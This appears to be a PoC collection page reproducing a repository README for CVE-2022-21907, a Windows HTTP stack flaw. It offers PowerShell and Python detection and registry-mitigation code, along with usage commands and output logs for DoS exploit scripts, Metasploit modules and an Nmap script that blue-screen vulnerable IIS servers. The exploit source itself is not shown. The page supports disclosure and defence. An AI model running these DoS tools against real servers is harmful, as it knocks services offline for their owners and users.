CVE-2022-21907 PoC — Microsoft Windows security vulnerability

Source
Related vulnerability
Title: Microsoft Windows security vulnerability (CVE-2022-21907)
Description: Microsoft Windows is an operating system for personal devices developed by Microsoft (USA). A security vulnerability exists in the Microsoft Windows HTTP Protocol Stack. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows 10 Version 1809 for ARM64-based Systems, Windows Ser
Description
CVE-2022-21907: detection, protection, exploitation and demonstration. Exploitation: Powershell, Python, Ruby, NMAP and Metasploit. Detection and protection: Powershell. Demonstration: Youtube.
Introduction
# CVE-2022-21907

## Description

 1. This repository detects whether a system is vulnerable to `CVE-2022-21907` (**CVSS:3.1 9.8**) and, if desired, protects against it. Two PowerShell one-liners are provided for each task.
 2. Pure Python, PowerShell and Ruby scripts, plus Metasploit and Nmap modules, are provided to attack a vulnerable IIS web server (a DoS that crashes the server with a blue screen).

## Detection and protection

### Script

This script runs the two detection one-liners and the two protection one-liners listed below.

```text
cmd> powershell ./detection_protection_cve2022_21907.ps1

CVE-2022-21907  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

Not vulnerable to CVE-2022-2190
Not vulnerable to CVE-2022-2190
Not vulnerable to CVE-2022-2190
Not vulnerable to CVE-2022-2190

cmd>
```

### Detect only (oneline)

```powershell
$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and $(Write-Host "$env:computername vulnerable to CVE-2022-2190 !")
```

```powershell
$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 !"}else{echo "Not vulnerable to CVE-2022-2190"}
```

### Detect and protect (oneline)

Run this powershell line **as administrator** to protect your computer/server.

```powershell
$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and ($(Write-Host "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0") -or $(Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport -Value 0))
```

```powershell
$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0";Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport -Value 0}else{echo "Not vulnerable to CVE-2022-2190"}
```
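The same registry check the one-liners above perform, written as an added Python example (not part of this repository): the decision logic is separated from the registry access so it can be tested offline, and the registry access uses the standard-library `winreg` module, so it only runs on Windows. The key path and value name are the ones on this page; the caveat in the comment comes from Microsoft's advisory for this CVE.

```python
from typing import Optional

# Registry location used by the page's one-liners (HKLM hive).
HTTP_PARAMS_KEY = r"SYSTEM\CurrentControlSet\Services\HTTP\Parameters"
VALUE_NAME = "EnableTrailerSupport"


def classify_trailer_support(value: Optional[int]) -> str:
    """Same decision as the one-liners: a missing value (None) or 0 means
    HTTP trailer support is off and the registry mitigation is in place;
    any other value means trailers are enabled.
    Caveat (Microsoft advisory): this value is the mitigation only for
    Windows 10 1809 / Server 2019; later affected versions are vulnerable
    by default and need the patch, so 'not vulnerable' here is not 'patched'."""
    if value is None or value == 0:
        return "not vulnerable"
    return "vulnerable"


def read_trailer_support() -> Optional[int]:
    """Read the value from HKLM; None if key or value is absent. Windows only."""
    import winreg  # standard library, Windows only
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, HTTP_PARAMS_KEY) as key:
            value, _kind = winreg.QueryValueEx(key, VALUE_NAME)
            return int(value)
    except FileNotFoundError:
        return None


def disable_trailer_support() -> None:
    """Set EnableTrailerSupport to 0, as the protect one-liners do.
    Needs an elevated (administrator) shell. Windows only."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, HTTP_PARAMS_KEY, 0,
                        winreg.KEY_SET_VALUE) as key:
        winreg.SetValueEx(key, VALUE_NAME, 0, winreg.REG_DWORD, 0)


def check_and_protect(fix: bool = False) -> str:
    """Report the state and optionally apply the mitigation; returns the
    state after any change (re-read from the registry)."""
    state = classify_trailer_support(read_trailer_support())
    if state == "vulnerable" and fix:
        disable_trailer_support()
        state = classify_trailer_support(read_trailer_support())
    return state


if __name__ == "__main__":
    import sys
    print(check_and_protect(fix="--fix" in sys.argv))
```

Run with `--fix` from an administrator shell to apply the mitigation; without it the script only reports.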

## Exploit: DOS - BlueScreen

Demonstrations (using powershell scripts, metasploit and nmap) on youtube:

[![Powershell: DOS attack on IIS](https://img.youtube.com/vi/kaZrfpsh3ds/0.jpg "Powershell: DOS attack on IIS")](https://www.youtube.com/watch?v=kaZrfpsh3ds)
[![Metasploit: DOS attack on IIS](https://img.youtube.com/vi/-HHrdhdt3QU/0.jpg "Metasploit: DOS attack on IIS")](https://www.youtube.com/watch?v=-HHrdhdt3QU)
[![Nmap: DOS attack on IIS](https://img.youtube.com/vi/-mirw5-IPHQ/0.jpg "Nmap: DOS attack on IIS")](https://www.youtube.com/watch?v=-mirw5-IPHQ)

### Python

```bash
python3 CVE202221907.py
# OR
chmod u+x CVE202221907.py
./CVE202221907.py

python3 CVE202221907.py <target>
# OR
chmod u+x CVE202221907.py
./CVE202221907.py <target>

python3 CVE202221907.py 10.10.10.10
# OR
chmod u+x CVE202221907.py
./CVE202221907.py 10.10.10.10:8000
# OR
python3 CVE202221907.py mywebservername
```

```text
~# python CVE202221907.py

CVE-2022-21907  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

Target: 10.10.10.10

[+] http://10.10.10.10 is UP. Send payload...
[+] http://10.10.10.10 is DOWN. 10.10.10.10 is vulnerable to CVE-2022-21907.

~# 
```

### Powershell

```powershell
powershell ./CVE-2022-21907.ps1
powershell ./CVE-2022-21907.ps1 mywebservername
powershell ./CVE-2022-21907.ps1 -Target 10.10.10.10
```

```text
cmd> powershell ./CVE-2022-21907.ps1

cmdlet CVE-2022-21907.ps1 at command pipeline position 1
Supply values for the following parameters:
target: 10.10.10.10:8000

CVE-2022-21907  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

cmd>
```

### Ruby

```bash
ruby CVE-2022-21907.rb
ruby CVE-2022-21907.rb 10.10.10.10
```

```text
~# ruby CVE-2022-21907.rb

CVE-2022-21907  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

Host (target): 10.10.10.10
[+] Target: 10.10.10.10 is vulnerable and down.

~#
```

### Metasploit

#### Python module

```text
msf6 > use exploit/windows/iis/py_dos_iis_2022_21907
msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > set RPORT 80
RPORT => 80
msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > exploit
[*] Running module against 127.0.0.1

[*] Starting server...
[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - Trying first connection...
[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - First connection OK. Sending payload...
[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - Target is down ! Congratulations !
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) >
```

#### Ruby module

```text
msf6 > use exploit/windows/iis/rb_dos_iis_2022_21907 
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > exploit
[*] Running module against 10.10.10.10

[+] Target is down ! Congratulations !
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) >
```

### Nmap

```bash
nmap -p 80 --script dos_iis_2022_21907 10.10.10.10
```

```text
~# nmap -p 80 --script dos_iis_2022_21907 10.10.10.10
80/tcp open  http
| dos_iis_2022_21907:
|   VULNERABLE:
|   IIS CVE-2022-21907 DOS
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2022-21907
|                   The IIS Web Server contains a RCE vulnerability. This script
|                   exploits this vulnerability with a DOS attack
|                   (causes a Blue Screen).
|
|     Disclosure date: 2022-01-11
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2022-21907
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907
|_      https://github.com/mauricelambert/CVE-2022-21907
```

## Sources

 - [Microsoft](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907)
 - [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2022-21907)
 - [Pure ruby script documentation](https://mauricelambert.github.io/info/ruby/code/CVE-2022-21907/CVE202221907.html)

## Licence

Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).
File snapshot

```text
[4.0K] /data/pocs/d55f204cd1d58c7f298bca9cab359e58bde873be
├── [2.6K] CVE-2022-21907.ps1
├── [3.1K] CVE202221907.py
├── [4.1K] CVE-2022-21907.rb
├── [2.6K] detection_protection_cve2022_21907.ps1
├── [2.8K] dos_iis_2022_21907.nse
├── [ 35K] LICENSE.txt
├── [ 330] payload.txt
├── [3.8K] py_dos_iis_2022_21907.py
├── [2.4K] rb_dos_iis_2022_21907.md
├── [3.1K] rb_dos_iis_2022_21907.rb
└── [6.9K] README.md

0 directories, 11 files
```